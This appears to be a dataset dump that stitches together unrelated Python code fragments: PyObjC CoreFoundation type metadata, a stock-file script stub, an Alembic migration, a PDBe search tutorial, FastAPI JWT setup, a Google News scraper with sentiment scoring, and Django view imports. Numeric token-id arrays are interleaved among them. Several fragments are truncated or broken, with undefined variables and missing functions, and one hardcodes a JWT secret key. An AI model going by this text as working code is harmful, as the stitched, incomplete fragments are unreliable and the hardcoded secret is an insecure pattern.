},
),
"CFBundleCopySharedSupportURL": (
b"^{__CFURL=}^{__CFBundle=}",
"",
{"retval": {"already_cfretained": True}},
),
"CFCharacterSetCreateWithCharactersInString": (
b"^{__CFCharacterSet=}^{__CFAllocator=}^{__CFString=}",
"",
{"retval": {"already_cfretained": True}},
),
"CFBitVectorGetTypeID": (sel32or64(b"L", b"Q"),),
"CFPreferencesCopyKeyList": (
b"^{__CFArray=}^{__CFString=}^{__CFString=}^{__CFString=}",
"",
{"retval": {"already_cfretained": True}},
),
"CFDateFormatterGetTypeID": (sel32or64(b"L", b"Q"),),
"CFRunLoopSourceGetContext": (
sel32or64(
b"v^{__CFRunLoopSource=}^{_CFRunLoopSourceContext=l^v^?^?^?^?^?^?^?^?}",
b"v^{__CFRunLoopSource=}^{_CFRunLoopSourceContext=q^v^?^?^?^?^?^?^?^?}",
),
),
"CFBundleGetAllBundles": (b"^{__CFArray=}",),
"CFFileSecuritySetGroupUUID": (b"Z^{__CFFileSecurity=}^{__CFUUID=}",),
"CFCharacterSetCreateMutableCopy": (
b"^{__CFCharacterSet=}^{__CFAllocator=}^{__CFCharacterSet=}",
"",
{"retval": {"already_cfretained": True}},
),
"CFStringGetRangeOfComposedCharactersAtIndex": (
sel32or64(b"{_CFRange=ll}^{__CFString=}l", b"{_CFRange=qq}^{__CFString=}q"),
),
"CFAttributedStringBeginEditing": (b"v^{__CFAttributedString=}",),
"CFNumberFormatterGetFormat": (b"^{__CFString=}^{__CFNumberFormatter=}",),
"CFErrorGetTypeID": (sel32or64(b"L", b"Q"),),
"CFURLCopyParameterString": (
b"^{__CFString=}^{__CFURL=}^{__CFString=}",
"",
{"retval": {"already_cfretained": True}},
),
"CFAttributedStringGetAttributesAndLongestEffectiveRange": (
sel32or64(
b"^{__CFDictionary=}^{__CFAttributedString=}l{_CFRange=ll}^{_CFRange=ll}",
b"^{__CFDictionary=}^{__CFAttributedString=}q{_CFRange=qq}^{_CFRange=qq}",
),
"",
{"arguments": {3: {"type_modifier": "o"}}},
),
"CFXMLParserGetContext": (
sel32or64(
b"v^{__CFXMLParser=}^{_CFXMLParserContext=l^v^?^?^?}",
b"v^{__CFXMLParser=}^{_CFXMLParserContext=q^v^?^?^?}",
),
),
"CFCopyDescription": (
b"^{__CFString=}@",
"",
{"retval": {"already_cfretained": True}},
),
"CFDataDeleteBytes": (
sel32or64(b"v^{__CFData=}{_CFRange=ll}", b"v^{__CFData=}{_CFRange=qq}"),
),
"CFWriteStreamGetError": (
sel32or64(
b"{_CFStreamError=ll}^{__CFWriteStream=}",
b"{_CFStreamError=qi}^{__CFWriteStream=}",
),
),
"CFURLCreateResourcePropertiesForKeysFromBookmarkData": (
b"^{__CFDictionary=}^{__CFAllocator=}^{__CFArray=}^{__CFData=}",
"",
{"retval": {"already_cfretained": True}},
),
"CFBitVectorGetFirstIndexOfBit": (
sel32or64(
b"l^{__CFBitVector=}{_CFRange=ll}L", b"q^{__CFBitVector=}{_CFRange=qq}I"
),
),
"CFCharacterSetCreateCopy": (
b"^{__CFCharacterSet=}^{__CFAllocator=}^{__CFCharacterSet=}",
"",
{"retval": {"already_cfretained": True}},
),
"CFStringCreateMutableWithExternalCharactersNoCopy": (
sel32or64(
b"^{__CFString=}^{__CFAllocator=}^Tll^{__CFAllocator=}",
b"^{__CFString=}^{__CFAllocator=}^Tqq^{__CFAllocator=}",
),
"",
{
"retval": {"already_cfretained": True},
"arguments": {1: {"c_array_length_in_arg": 2, "type_modifier": "n"}},
},
),
"CFRunLoopCopyCurrentMode": (
b"^{__CFString=}^{__CFRunLoop=}",
"",
{"retval": {"already_cfretained": True}},
),
"CFBundleGetPackageInfo": (
sel32or64(b"v^{__CFBundle=}^L^L", b"v^{__CFBundle=}^I^I"),
"",
{"arguments": {1: {"type_modifier": "o"}, 2: {"type_modifier": "o"}}},
),
"CFCalendarSetFirstWeekday": (
sel32or64(b"v^{__CFCalendar=}l", b"v^{__CFCalendar=}q"),
),
"CFStringGetFastestEncoding": (sel32or64(b"L^{__CFString=}", b"I^{__CFString=}"),),
"CFSocketIsValid": (b"Z^{__CFSocket=}",),
"CFTreeGetChildren": (
b"v^{__CFTree=}^^{__CFTree=}",
"",
{"arguments": {1: {"c_array_of_variable_length": True, "type_modifier": "o"}}},
),
"CFBundleGetLocalInfoDictionary": (b"^{__CFDictionary=}^{__CFBundle=}",),
"CFArrayBSearchValues": (
sel32or64(
b"l^{__CFArray=}{_CFRange=ll}@^?@", b"q^{__CFArray=}{_CFRange=qq}@^?@"
),
"",
{
"arguments": {
3: {
"callable": {
"retval": {"type": b"l"},
"arguments": {
0: {"type": b"@"},
1: {"type": b"@"},
2: {"type": b"@"},
},
},
"callable_retained": False,
}
}
},
),
"CFTreeGetNextSibling": (b"^{__CFTree=}^{__CFTree=}",),
"CFMessagePortGetTypeID": (sel32or64(b"L", b"Q"),),
"CFBagGetCount": (sel32or64(b"l^{__CFBag=}", b"q^{__CFBag=}"),),
"CFBagRemoveAllValues": (b"v^{__CFBag=}",),
"CFCharacterSetCreateBitmapRepresentation": (
b"^{__CFData=}^{__CFAllocator=}^{__CFCharacterSet=}",
"",
{"retval": {"already_cfretained": True}},
),
"CFXMLParserGetDocument": (b"^v^{__CFXMLParser=}",),
"CFXMLNodeGetTypeCode": (sel32or64(b"l^{__CFXMLNode=}", b"q^{__CFXMLNode=}"),),
"CFArrayGetValues": (
sel32or64(b"v^{__CFArray=}{_CFRange=ll}^@", b"v^{__CFArray=}{_CFRange=qq}^@"),
"",
{"arguments": {2: {"c_array_length_in_arg": 1, "type_modifier": "o"}}},
),
"CFCharacterSetIsSupersetOfSet": (b"Z^{__CFCharacterSet=}^{__CFCharacterSet=}",),
"CFRunLoopObserverGetTypeID": (sel32or64(b"L", b"Q"),),
"CFAbsoluteTimeGetGregorianDate": (
sel32or64(
b"{_CFGregorianDate=lccccd}d^{__CFTimeZone=}",
b"{_CFGregorianDate=iccccd}d^{__CFTimeZone=}",
),
),
"CFNotificationCenterRemoveObserver": (
b"v^{__CFNotificationCenter=}@^{__CFString=}@",
),
"CFCalendarSetTimeZone": (b"v^{__CFCalendar=}^{__CFTimeZone=}",),
"CFSetCreateMutableCopy": (
sel32or64(
b"^{__CFSet=}^{__CFAllocator=}l^{__CFSet=}",
b"^{__CFSet=}^{__CFAllocator=}q^{__CFSet=}",
),
"",
{"retval": {"already_cfretained": True}},
),
"CFXMLTreeCreateWithNode": (
b"^{__CFTree=}^{__CFAllocator=}^{__CFXMLNode=}",
"",
{"retval": {"already_cfretained": True}},
),
"CFRunLoopTimerGetOrder": (
sel32or64(b"l^{__CFRunLoopTimer=}", b"q^{__CFRunLoopTimer=}"),
),
"CFTreeCreate": (
sel32or64(
b"^{__CFTree=}^{__CFAllocator=}^{_CFTreeContext=l^v^?^?^?}",
b"^{__CFTree=}^{__CFAllocator=}^{_CFTreeContext=q^v^?^?^?}",
),
"",
{"retval": {"already_cfretained": True}},
),
"CFPreferencesCopyAppValue": (
b"@^{__CFString=}^{__CFString=}",
"",
{"retval": {"already_cfretained": True}},
),
"CFXMLNodeGetString": (b"^{__CFString=}^{__CFXMLNode=}",),
"CFSocketCreateWithSocketSignature": (
sel32or64(
b"^{__CFSocket=}^{__CFAllocator=}^{_CFSocketSignature=lll^{__CFData=}}L^?^{_CFSocketContext=l^v^?^?^?}",
b"^{__CFSocket=}^{__CFAllocator=}^{_CFSocketSignature=iii^{__CFData=}}Q^?^{_CFSocketContext=q^v^?^?^?}",
),
"",
{
"retval": {"already_cfretained": True},
"arguments": {
3: {
"callable": {
"retval": {"type": b"v"},
"arguments": {
0: {"type": b"^{__CFSocket=}"},
1: {"type": b"Q"},
2: {"type": b"^{__CFData=}"},
3: {"type": b"^v"},
4: {"type": b"^v"},
},
}
}
},
},
),
"CFURLEnumeratorCreateForDirectoryURL": (
sel32or64(
b"^{__CFURLEnumerator=}^{__CFAllocator=}^{__CFURL=}L^{__CFArray=}",
b"^{__CFURLEnumerator=}^{__CFAllocator=}^{__CFURL=}Q^{__CFArray=}",
),
"",
{"retval": {"already_cfretained": True}},
),
}
aliases = {
"CFDateFormatterKey": "CFStringRef",
"CFNumberFormatterKey": "CFStringRef",
"CF_TYPED_EXTENSIBLE_ENUM": "_CF_TYPED_EXTENSIBLE_ENUM",
"CF_EXTENSIBLE_STRING_ENUM": "_CF_TYPED_EXTENSIBLE_ENUM",
"CF_STRING_ENUM": "_CF_TYPED_ENUM",
"CFErrorDomain": "CFStringRef",
"CF_TYPED_ENUM": "_CF_TYPED_ENUM",
"CFRunLoopMode": "CFStringRef",
"kCFBookmarkResolutionWithoutMountingMask": "kCFURLBookmarkResolutionWithoutMountingMask",
"kCFBookmarkResolutionWithoutUIMask": "kCFURLBookmarkResolutionWithoutUIMask",
"CFCalendarIdentifier": "CFStringRef",
"kCFFileSecurityRemoveACL": "_FILESEC_REMOVE_ACL",
"CFXMLTreeRef": "CFTreeRef",
"CFStreamPropertyKey": "CFStringRef",
"CFLocaleKey": "CFStringRef",
"CFNotificationName": "CFStringRef",
"CFLocaleIdentifier": "CFStringRef",
}
cftypes = [
("CFAllocatorRef", b"^{__CFAllocator=}", "CFAllocatorGetTypeID", None),
("CFArrayRef", b"^{__CFArray=}", "CFArrayGetTypeID", "NSArray"),
(
"CFAttributedStringRef",
b"^{__CFAttributedString=}",
"CFAttributedStringGetTypeID",
"__NSCFAttributedString,NSCFAttributedString",
),
("CFBagRef", b"^{__CFBag=}", "CFBagGetTypeID", None),
("CFBinaryHeapRef", b"^{__CFBinaryHeap=}", "CFBinaryHeapGetTypeID", None),
("CFBitVectorRef", b"^{__CFBitVector=}", "CFBitVectorGetTypeID", None),
(
"CFBooleanRef",
b"^{__CFBoolean=}",
"CFBooleanGetTypeID",
"__NSCFBoolean,NSCFBoolean",
),
("CFBundleRef", b"^{__CFBundle=}", "CFBundleGetTypeID", None),
(
"CFCalendarRef",
b"^{__CFCalendar=}",
"CFCalendarGetTypeID",
"__NSCFCalendar,NSCFCalendar",
),
(
"CFCharacterSetRef",
b"^{__CFCharacterSet=}",
"CFCharacterSetGetTypeID",
"__NSCFCharacterSet,NSCFCharacterSet",
),
("CFDataRef", b"^{__CFData=}", "CFDataGetTypeID", "__NSCFData,NSCFData"),
("CFDateFormatterRef", b"^{__CFDateFormatter=}", "CFDateFormatterGetTypeID", None),
("CFDateRef", b"^{__CFDate=}", "CFDateGetTypeID", "__NSCFDate,NSCFDate,__NSDate"),
("CFDictionaryRef", b"^{__CFDictionary=}", "CFDictionaryGetTypeID", "NSDictionary"),
("CFErrorRef", b"^{__CFError=}", "CFErrorGetTypeID", "__NSCFError,NSCFError"),
(
"CFFileDescriptorRef",
b"^{__CFFileDescriptor=}",
"CFFileDescriptorGetTypeID",
None,
),
(
"CFFileSecurityRef",
b"^{__CFFileSecurity=}",
"CFFileSecurityGetTypeID",
"__NSFileSecurity",
),
("CFLocaleRef", b"^{__CFLocale=}", "CFLocaleGetTypeID", "__NSCFLocale,NSCFLocale"),
("CFMachPortRef", b"^{__CFMachPort=}", "CFMachPortGetTypeID", "NSMachPort"),
("CFMessagePortRef", b"^{__CFMessagePort=}", "CFMessagePortGetTypeID", None),
("CFMutableArrayRef", b"^{__CFArray=}", "CFArrayGetTypeID", "NSMutableArray"),
(
"CFMutableAttributedStringRef",
b"^{__CFAttributedString=}",
"CFAttributedStringGetTypeID",
"__NSCFAttributedString,NSCFAttributedString",
),
("CFMutableBagRef", b"^{__CFBag=}", "CFBagGetTypeID", None),
("CFMutableBitVectorRef", b"^{__CFBitVector=}", "CFBitVectorGetTypeID", None),
(
"CFMutableCharacterSetRef",
b"^{__CFCharacterSet=}",
"CFCharacterSetGetTypeID",
None,
),
("CFMutableDataRef", b"^{__CFData=}", "CFDataGetTypeID", "NSMutableData"),
(
"CFMutableDictionaryRef",
b"^{__CFDictionary=}",
"CFDictionaryGetTypeID",
"NSMutableDictionary",
),
("CFMutableSetRef", b"^{__CFSet=}", "CFSetGetTypeID", "NSMutableSet"),
("CFMutableStringRef", b"^{__CFString=}", "CFStringGetTypeID", None),
(
"CFNotificationCenterRef",
b"^{__CFNotificationCenter=}",
"CFNotificationCenterGetTypeID",
None,
),
("CFNullRef", b"^{__CFNull=}", "CFNullGetTypeID", "NSNull"),
(
"CFNumberFormatterRef",
b"^{__CFNumberFormatter=}",
"CFNumberFormatterGetTypeID",
None,
),
("CFNumberRef", b"^{__CFNumber=}", "CFNumberGetTypeID", "__NSCFNumber,NSCFNumber"),
(
"CFPlugInInstanceRef",
b"^{__CFPlugInInstance=}",
"CFPlugInInstanceGetTypeID",
None,
),
(
"CFReadStreamRef",
b"^{__CFReadStream=}",
"CFReadStreamGetTypeID",
"__NSCFInputStream,NSCFInputStream",
),
(
"CFRunLoopObserverRef",
b"^{__CFRunLoopObserver=}",
"CFRunLoopObserverGetTypeID",
None,
),
("CFRunLoopRef", b"^{__CFRunLoop=}", "CFRunLoopGetTypeID", None),
("CFRunLoopSourceRef", b"^{__CFRunLoopSource=}", "CFRunLoopSourceGetTypeID", None),
(
"CFRunLoopTimerRef",
b"^{__CFRunLoopTimer=}",
"CFRunLoopTimerGetTypeID",
"__NSCFTimer,NSCFTimer",
),
("CFSetRef", b"^{__CFSet=}", "CFSetGetTypeID", "NSSet"),
("CFSocketRef", b"^{__CFSocket=}", "CFSocketGetTypeID", None),
("CFStringRef", b"^{__CFString=}", "CFStringGetTypeID", "NSString"),
(
"CFStringTokenizerRef",
b"^{__CFStringTokenizer=}",
"CFStringTokenizerGetTypeID",
None,
),
("CFTimeZoneRef", b"^{__CFTimeZone=}", "CFTimeZoneGetTypeID", "NSTimeZone"),
("CFTreeRef", b"^{__CFTree=}", "CFTreeGetTypeID", None),
("CFURLEnumeratorRef", b"^{__CFURLEnumerator=}", "CFURLEnumeratorGetTypeID", None),
("CFURLRef", b"^{__CFURL=}", "CFURLGetTypeID", "NSURL"),
("CFUUIDRef", b"^{__CFUUID=}", "CFUUIDGetTypeID", None),
(
"CFUserNotificationRef",
b"^{__CFUserNotification=}",
"CFUserNotificationGetTypeID",
None,
),
(
"CFWriteStreamRef",
b"^{__CFWriteStream=}",
"CFWriteStreamGetTypeID",
"__NSCFOutputStream,NSCFOutputStream",
),
("CFXMLNodeRef", b"^{__CFXMLNode=}", "CFXMLNodeGetTypeID", None),
("CFXMLParserRef", b"^{__CFXMLParser=}", "CFXMLParserGetTypeID", None),
]
expressions = {
"kCFISO8601DateFormatWithFullTime": "kCFISO8601DateFormatWithTime | kCFISO8601DateFormatWithColonSeparatorInTime | kCFISO8601DateFormatWithTimeZone | kCFISO8601DateFormatWithColonSeparatorInTimeZone",
"kCFISO8601DateFormatWithFullDate": "kCFISO8601DateFormatWithYear | kCFISO8601DateFormatWithMonth | kCFISO8601DateFormatWithDay | kCFISO8601DateFormatWithDashSeparatorInDate",
"kCFISO8601DateFormatWithInternetDateTime": "kCFISO8601DateFormatWithFullDate | kCFISO8601DateFormatWithFullTime",
}
# END OF FILE
| [
2,
770,
2393,
318,
7560,
416,
9432,
13,
38993,
198,
2,
198,
2,
4586,
4296,
25,
2892,
1526,
1467,
8487,
25,
4309,
25,
1314,
12131,
198,
2,
198,
2,
781,
539,
23,
25,
645,
20402,
198,
198,
11748,
26181,
66,
11,
25064,
198,
198,
361... | 1.897908 | 94,366 |
import argparse
import xml.etree.ElementTree as ET
import requests
import numpy
from progress.bar import Bar
bar = Bar('Sending', max=4000)
try :
dictdata = numpy.load("stockDictionary.npy",allow_pickle=True)
except :
if args.downloadStock or args.syncDictionary :
pass
else:
print("Try using python3 graffati.py -ds to download the stock file with dictionary ")
exit();
with open('./outputdata.txt','w') as f :
f.write("Products \n")
if __name__ == "__main__":
main()
#https://www.no1brand.ru/pr/N1B-11ED9FB
| [
11748,
1822,
29572,
220,
198,
11748,
35555,
13,
316,
631,
13,
20180,
27660,
355,
12152,
198,
11748,
7007,
198,
11748,
299,
32152,
220,
198,
6738,
4371,
13,
5657,
1330,
2409,
198,
198,
5657,
796,
2409,
10786,
50,
1571,
3256,
3509,
28,
... | 2.502183 | 229 |
import json
import docker
from django.conf import settings
| [
11748,
33918,
198,
11748,
36253,
198,
198,
6738,
42625,
14208,
13,
10414,
1330,
6460,
628,
198
] | 3.875 | 16 |
"""empty message
Revision ID: 3acf60608a7d
Revises: 48a5caa0a762
Create Date: 2015-03-26 11:26:40.461247
"""
# revision identifiers, used by Alembic.
revision = '3acf60608a7d'
down_revision = '48a5caa0a762'
from alembic import op
import sqlalchemy as sa
| [
37811,
28920,
3275,
198,
198,
18009,
1166,
4522,
25,
513,
330,
69,
1899,
28688,
64,
22,
67,
198,
18009,
2696,
25,
4764,
64,
20,
6888,
64,
15,
64,
48194,
198,
16447,
7536,
25,
1853,
12,
3070,
12,
2075,
1367,
25,
2075,
25,
1821,
13,... | 2.385321 | 109 |
#!/usr/bin/env python3
# Copyright 2018 EMBL - European Bioinformatics Institute
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND,
# either express or implied. See the License for the specific
# language governing permissions and limitations under the
# License.
"""
PDBe API Training
This interactive Python notebook will guide you through various ways of programmatically accessing Protein Data Bank in Europe (PDBe) data using REST API
The REST API is a programmatic way to obtain information from the PDB and EMDB. You can access details about:
sample
experiment
models
compounds
cross-references
publications
quality
assemblies
and more...
For more information, visit http://www.ebi.ac.uk/pdbe/pdbe-rest-api
"""
# DEPENDENCIES:
# requests
"""
1) Making imports and setting variables
First, we import some packages that we will use, and set some variables.
Note: Full list of valid URLs is available from http://www.ebi.ac.uk/pdbe/api/doc/
"""
import requests
search_url = "https://www.ebi.ac.uk/pdbe/search/pdb/select?q="
search_variables = "&wt=json&rows=10"
"""
## 2) Defining request function
Let's start with defining a function that can be used to get a URL response. We will use this function to
retrieving the search results in JSON format.
"""
"""
3) Defining search function
We need a function that will construct the search string in the adequate query format, and which will then get the
data in JSON format using the url_response() function implemented earlier.
"""
"""
4) Trying out the search
Finally, we can try out our function using a custom search term. Note that the space between words has to be
types as "%20", for example "Homo%20sapiens".
The result will be a JSON with all PDB entries the search could find.
We print out the PDB ids using a simple for loop at the bottom.
"""
search_terms = 'molecule_name:"Dihydrofolate%20reductase" AND organism_scientific_name:"Homo%20sapiens"'
results = run_search(search_terms)
pdb_list = []
for result in results:
pdb = result["pdb_id"]
if pdb not in pdb_list:
pdb_list.append(pdb)
print(pdb_list)
| [
2,
48443,
14629,
14,
8800,
14,
24330,
21015,
18,
198,
198,
2,
15069,
2864,
17228,
9148,
532,
3427,
16024,
259,
18982,
873,
5136,
198,
2,
198,
2,
49962,
739,
262,
24843,
13789,
11,
10628,
362,
13,
15,
357,
1169,
366,
34156,
15341,
19... | 3.445531 | 716 |
from datetime import datetime, timedelta
from fastapi import HTTPException
from typing import Optional
from fastapi.security import OAuth2PasswordBearer
from fastapi import Depends
from jose import JWTError, jwt
from sqlalchemy.orm import Session
from database import get_db
from repository.user import User as ModelUser
import schemas
SECRET_KEY = "09d25e094faa6ca2556c818166b7a9563b93f7099f6f0f4caa6cf63b88e8d3e7"
ALGORITHM = "HS256"
ACCESS_TOKEN_EXPIRE_MINUTES = 60
oauth2_scheme = OAuth2PasswordBearer(tokenUrl="login")
| [
198,
6738,
4818,
8079,
1330,
4818,
8079,
11,
28805,
12514,
198,
6738,
3049,
15042,
1330,
14626,
16922,
198,
6738,
19720,
1330,
32233,
198,
6738,
3049,
15042,
13,
12961,
1330,
440,
30515,
17,
35215,
3856,
11258,
198,
198,
6738,
3049,
15042... | 2.805263 | 190 |
from scrapy import Selector
| [
6738,
15881,
88,
1330,
9683,
273,
628
] | 4.142857 | 7 |
import discord
from discord.ext import commands, tasks
class History(commands.Cog):
"""History commands.""" | [
11748,
36446,
198,
6738,
36446,
13,
2302,
1330,
9729,
11,
8861,
198,
198,
4871,
7443,
7,
9503,
1746,
13,
34,
519,
2599,
198,
220,
220,
220,
37227,
18122,
9729,
526,
15931
] | 3.612903 | 31 |
import numpy as np
import random
from torch.utils.data.dataset import Dataset
def cross_entropy(input, target, size_average=True):
""" Cross entropy that accepts soft targets
Args:
pred: predictions for neural network
targets: targets, can be soft
size_average: if false, sum is returned instead of mean
Examples::
input = torch.FloatTensor([[1.1, 2.8, 1.3], [1.1, 2.1, 4.8]])
input = torch.autograd.Variable(out, requires_grad=True)
target = torch.FloatTensor([[0.05, 0.9, 0.05], [0.05, 0.05, 0.9]])
target = torch.autograd.Variable(y1)
loss = cross_entropy(input, target)
loss.backward()
"""
logsoftmax = torch.nn.LogSoftmax(dim=1)
if size_average:
return torch.mean(torch.sum(-target * logsoftmax(input), dim=1))
else:
return torch.sum(torch.sum(-target * logsoftmax(input), dim=1))
| [
11748,
299,
32152,
355,
45941,
198,
11748,
4738,
198,
6738,
28034,
13,
26791,
13,
7890,
13,
19608,
292,
316,
1330,
16092,
292,
316,
628,
198,
4299,
3272,
62,
298,
28338,
7,
15414,
11,
2496,
11,
2546,
62,
23913,
28,
17821,
2599,
198,
... | 2.371429 | 385 |
#Author: Zifan Wang | frank@zifan.wang
import re
import urllib.request
import collections
import time
from textblob import TextBlob
if __name__ == '__main__':
print("Please input key words: ", end='')
key_words = input().strip().replace(" ", "+")
print("Please input result number limit: ", end='')
limit = int(input().strip())
if limit % 100 != 0:
limit = limit // 100 + 1
else:
limit = limit // 100
print("Alright, let's go")
url = f"https://www.google.com/search?safe=strict&tbs=sbd%3A1&qdr:m&tbm=nws&q={key_words}&hl=en&lr=lang_en&num=100&strip=1"
# url = 'https://www.google.com/search?safe=strict&tbs=sbd%3A1&qdr:m&tbm=nws&q=Coronavirus+China&hl=en&lr=lang_en&num=100&strip=1'
headers = {
'Host': 'www.google.com',
'Connection': 'keep-alive',
'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.122 Safari/537.36',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9',
'Accept-Language': 'zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7',
}
news_list = []
i = 0
print("Wait", end="")
while i < limit:
request = urllib.request.Request(url=url, headers=headers)
response = urllib.request.urlopen(request)
raw = response.read().decode('utf-8')
raw_list = raw.split('<div class="bkWMgd">')[1:]
for r in raw_list:
link = re.search('href="([^"]+?)"', r).group(1)
s = re.search('</g-img>([^<]+?)</div><div class="phYMDf nDgy9d" style="-webkit-line-clamp:2">([^<]+?)</div>', r)
try:
source = s.group(1)
except AttributeError as e:
source = ""
try:
title = s.group(2)
except AttributeError as e:
title = ""
news_list.append(News(link, source, title, "", None))
url = f"https://www.google.com/search?safe=strict&tbs=sbd%3A1&qdr:m&tbm=nws&q=Coronavirus+China&oq=Coronavirus+China&hl=en&lr=lang_en&num=100&strip=1&start={i*100}"
i += 1
print("..", end="")
print(f"\nObtained {len(news_list)} records on Google News.")
print("Now start further processing...")
man_links_title = []
man_links_time = []
man_links_both = []
headers = {
'Connection': 'keep-alive',
'User-Agent': "Mozilla/5.0",
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9',
'Accept-Language': 'zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7',
}
for n in news_list:
if n.source == "South China Morning Post":
n.time = "Null1"
continue
request = urllib.request.Request(url=n.link, headers = headers)
reopen = False
try:
response = urllib.request.urlopen(request)
except Exception as e:
reopen = True
if reopen:
time.sleep(5)
try:
response = urllib.request.urlopen(request, timeout=10)
except Exception as e:
man_links_both.append(n.link)
n.time = "Null1"
n.sentiment = TextBlob(n.title).sentiment
# print(f"Cannot open {n.link} Because {e}")
continue
try:
raw = response.read().decode('utf-8')
except Exception as e:
n.time = "Null1"
n.sentiment = TextBlob(n.title).sentiment
continue
try:
if n.source == 'South China Morning Post' or n.source == 'The New York Times' or n.source == 'CNBC'\
or n.source == 'Washington Post' or n.source == 'Wall Street Journal' or n.source == 'BBC News'\
or n.source == 'Daily Mail' or n.source == 'USA TODAY' or "abcnews.go.com" in n.link \
or n.source == 'CNA' or n.source == 'Globalnews.ca' or n.source == '7NEWS.com.au' or n.source == 'Seeking Alpha' \
or n.source == 'Eater NY' or n.source == 'New York Post' :
n.time = re.search('"datePublished":"([^"]+?)"', raw).group(1)
elif n.source == 'CNN International' or n.source == 'MarketWatch' or n.source == 'Newshub' or n.source == 'CTV News' \
or n.source == 'Richmond News' or n.source == 'The Star Online' :
n.time = re.search('"datePublished" content="([^"]+?)"', raw).group(1)
elif n.source == 'Reuters' or n.source == 'Aljazeera.com' or n.source == 'Livemint' or n.source == 'Khaleej Times' \
or n.source == '9News' or n.source == 'Sky News' or n.source == 'Fox News' or n.source == 'Economic Times' \
or n.source == 'Gulf News' or n.source == 'The Independent' or n.source == 'NEWS.com.au' \
or n.source == 'The Standard' or n.source == 'Reuters.com':
n.time = re.search('"datePublished": "([^"]+?)",', raw).group(1)
elif n.source == 'The Guardian' or n.source == 'Politico':
n.time = re.search("datetime='([^']+?)'", raw).group(1)
elif n.source == 'NPR' or n.source == 'straits times (press release)' or n.source == 'The Straits Times'\
or n.source == 'msnNOW' or n.source == 'KRQE News 13' or n.source == 'Bloomberg' or n.source == 'Al Jazeera America':
n.time = re.search('datetime="([^"]+?)"', raw).group(1)
elif n.source == 'Anadolu Agency':
n.time = re.search('<span style="padding-left:0px;" class="tarih">([^<]+?)</span>', raw).group(1)
elif n.source == 'Business Insider Nordic':
n.time = re.search('"datePublished":"([^"]+?)","dateModified"', raw).group(1)
elif n.source == 'Stuff.co.nz':
n.time = re.search('<span class="sics-component__byline__date">([^<]+?)</span>', raw).group(1)
elif n.source == 'Stuff.co.nz' or n.source == 'Stuff.co.nz' or "www.abc.net.au" in n.link or n.source == 'EcoWatch'\
or n.source == 'Financial Express' or n.source == 'WJTV' or n.source == 'The National Interest Online (blog)' \
or n.source == 'EcoWatch' or n.source == 'The Straits Times' or n.source == 'CNN International' or n.source == 'National Geographic':
n.time = re.search('"article:published_time" content="([^"]+?)"', raw).group(1)
elif n.source == 'CNN':
n.time = re.search('content="([^"]+?)" name="pubdate"', raw).group(1)
elif n.source == 'Forbes':
n.time = re.search('property="article:published"\s+?content="([^"]+?)"', raw).group(1)
elif n.source == 'MarketWatch (blog)':
n.time = re.search('name="parsely-pub-date" content="([^"]+?)"', raw).group(1)
elif n.source == 'KSL.com':
n.time = re.search('"pubDate":"([^"]+?)"', raw).group(1)
elif n.source == 'Nature.com':
n.time = re.search('name="prism.publicationDate" content="([^"]+?)"', raw).group(1)
elif n.source == 'ScienceAlert':
n.time = re.search('class="published_date" type="hidden" value="([^"]+?)"', raw).group(1)
else:
n.time = re.search('"datePublished":\s?"([^"]+?)"', raw).group(1)
except:
n.time = "Null2"
# print(f"Cannot find time in {n.link} - {n.source}")
man_links_time.append(n.link)
if n.title.endswith(" ..."):
in_title = n.title[:-4].replace("?", "\?").replace("$", "\$").replace(".", "\.")
try:
n_title = re.search(f'({in_title}[^<"\'\[\]/]+?)[<"\'\[\]/]', raw).group(1)
except Exception as e:
man_links_title.append(n.link)
# print(f"Cannot find title in {n.link}")
# with open(f"{n.title}.txt", mode="w") as f:
# f.write(raw)
n.sentiment = TextBlob(n.title).sentiment
continue
end = min(n_title.find(" - "), n_title.find(" | "))
if end != -1:
n_title = n_title[:end]
n_title.replace("'", "'").replace("'", "'").replace("[\t\n]", " ")
n.title = n_title
n.sentiment = TextBlob(n.title).sentiment
print("\r%-70s" % n.title, end="")
source_counter = collections.Counter()
title_counter = collections.Counter()
for n in news_list:
source_counter[n.source] += 1
title_token = n.title.lower().split(" ")
for token in title_token:
title_counter[token] += 1
# f.write("\n==========\nlinks need manual operation:\n")
# f.write(f'a. {len(man_links_title)} links \n')
# for link in man_links:
# f.write(f'{link}\n')
print("\n\nDone! Good Result:")
print(f"Obtained {len(news_list)} records.")
print("\nBad Result:")
print(f'{len(man_links_title)} links cannot get title')
print(f'{len(man_links_time)} links cannot get time')
print(f'{len(man_links_both)} links cannot get both title and time')
with open("news.txt", mode="w") as f:
for n in news_list:
f.write(str(n))
f.write("\n==========\nSource Counter:\n")
f.write(str(source_counter))
f.write("\n==========\nTitle Key Word counter:\n")
f.write(str(title_counter))
| [
2,
13838,
25,
1168,
361,
272,
15233,
930,
14346,
31,
89,
361,
272,
13,
47562,
198,
198,
11748,
302,
198,
11748,
2956,
297,
571,
13,
25927,
198,
11748,
17268,
198,
11748,
640,
198,
6738,
2420,
2436,
672,
1330,
8255,
3629,
672,
198,
1... | 2.040895 | 4,695 |
import numpy as np
import net.utilities
| [
11748,
299,
32152,
355,
45941,
198,
11748,
2010,
13,
315,
2410,
628
] | 3.416667 | 12 |
from insta.forms import CommentForm, ImageForm, ProfileForm, SignupForm
from django.shortcuts import render,redirect
# Create your views here.
from django.http import HttpResponse
from django.contrib.auth import login, authenticate
from django.contrib.sites.shortcuts import get_current_site
from django.utils.encoding import force_bytes, force_text
from django.utils.http import urlsafe_base64_encode, urlsafe_base64_decode
from django.template.loader import render_to_string
from django.contrib.auth.models import User
from django.contrib.auth.decorators import login_required
from .emails import send_activation_email
from .tokens import account_activation_token
from .models import Image, Profile, Comment
# def activate(request, uidb64, token):
# try:
# uid = force_text(urlsafe_base64_decode(uidb64))
# user = User.objects.get(pk=uid)
